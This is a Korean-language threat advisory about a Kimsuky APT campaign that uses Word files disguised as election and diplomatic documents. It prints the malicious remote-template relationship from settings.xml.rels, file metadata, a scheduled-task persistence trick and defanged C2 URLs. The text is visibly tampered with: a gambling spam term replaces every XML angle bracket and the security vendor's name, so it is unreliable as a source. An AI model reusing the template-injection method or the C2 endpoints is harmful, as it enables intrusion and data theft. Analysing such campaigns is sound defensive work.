김수키(Kimsuky)조직, 21대 국회의원 선거문서로 사칭한 스모크 스크린 APT 공격 수행
김수키(Kimsuky) 조직의 '스모크 스크린' 캠페인의 일환으로 추정되는 공격이 또 한번 포착되어 사용자들의 주의가 필요합니다.
이번 공격에 사용된 악성 파일은 '21대 국회의원 선거 관련.docx', '외교문서 관련(이재춘국장).docx' 파일을 위장하고 있습니다.
이번에 발견된 두 개의 악성 워드파일들의 파일명은 다르지만, 동작방식은 동일합니다.
먼저 악성 DOCX 문서가 실행되면, 아래와 같은내부'settings.xml.rels' 명령이 작동하고,악성 매크로 함수실행을 위해 특정 미리네 호스팅 C2 서버로 통신을 시도합니다.
바카라보라;?xml version="1.0" encoding="utf-8" standalone="yes"?
바카라보라;Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"
바카라보라;Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" Target="http://saemaeul[.]mireene.com/skin/board/basic/bin" TargetMode="External"/
바카라보라;/Relationships
DOCX 문서 파일의 작성자는'seong jin lee' 이름이 등록되어 있으며, 마지막 수정자는 'Robot Karll' 입니다.
바카라보라;dc:creatorseong jin lee바카라보라;/dc:creator
바카라보라;cp:keywords/
바카라보라;dc:description/
바카라보라;cp:lastModifiedByRobot Karll바카라보라;/cp:lastModifiedBy
바카라보라;cp:revision6바카라보라;/cp:revision
바카라보라;cp:lastPrinted2020-04-01T07:10:00Z바카라보라;/cp:lastPrinted
바카라보라;dcterms:created xsi:type="dcterms:W3CDTF"2020-04-01T06:01:00Z바카라보라;/dcterms:created
바카라보라;dcterms:modified xsi:type="dcterms:W3CDTF"2020-04-03T00:14:00Z바카라보라;/dcterms:modified
바카라보라;/cp:coreProperties
그리고 다음과 같이 [콘텐츠 사용] 버튼 클릭을 유도하는 문구를 보여줍니다. 만약 C2 서버와 통신이 실패하면 [콘텐츠 사용] 버튼은 나타나지 않습니다.
[그림 1] C2 서버 'saemaeul.mireene[.]com 서버와 통신해 매크로 실행 유도하는 과정
사용자가 [콘텐츠 사용] 버튼을 클릭해실행하면, 사용자에게는 다음과 같은 워드문서의 내용이 보이게 됩니다.
[그림 2] 21대 국회의원 선거 관련 내용이 담긴 악성 문서 화면
[그림 3] 외교 및 총선관련 내용이 담긴 악성 문서 화면
악성 매크로가 실행되면, '.NETFramework4.xml' 파일 이름으로 추가 명령을 생성합니다.
[그림 4] XML 내부 화면
그리고 윈도우 운영체제 정품인증 키관리 서비스(Key Management Service)처럼KMSAuto이름으로작업 스케줄러에 등록해 자동으로 실행되도록 설정합니다.
[그림 5] 작업스케줄러 명령어 화면
C2 명령제어 서버와다음과 같이 통신을 시도하며, 공격자의 추가 명령에 따라 다양한 정보유출이 진행될 수 있습니다.
http://saemaeul.mireene[.]com/skin/board/basic/bin
http://saemaeul.mireene[.]com/skin/board/basic/bin/report.php
http://saemaeul.mireene[.]com/skin/board/basic/bin/down.php?op=1
http://saemaeul.mireene[.]com/skin/board/basic/bin/down.php?op=2
http://saemaeul.mireene[.]com/skin/visit/basic/log
http://saemaeul.mireene[.]com/skin/visit/basic/log/report.php
http://saemaeul.mireene[.]com/skin/visit/basic/log/down.php?op=1
http://saemaeul.mireene[.]com/skin/visit/basic/log/down.php?op=2
올해 초부터 김수키(Kimsuky)조직은 국내 기업/기관 등을 대상으로 지속적으로스모크 스크린 캠페인을 벌이고 있습니다.
※ 스모크스크린 관련글
-
-
-
이에 기업 및 기관 사용자들의 각별한 주의가 필요합니다.
현재 바카라보라에서는 해당 악성코드에 대해Exploit.MSOffice.Gen,Trojan.Agent.183268E로 탐지중에 있습니다.
관련 IoC는에서 확인하실 수 있습니다.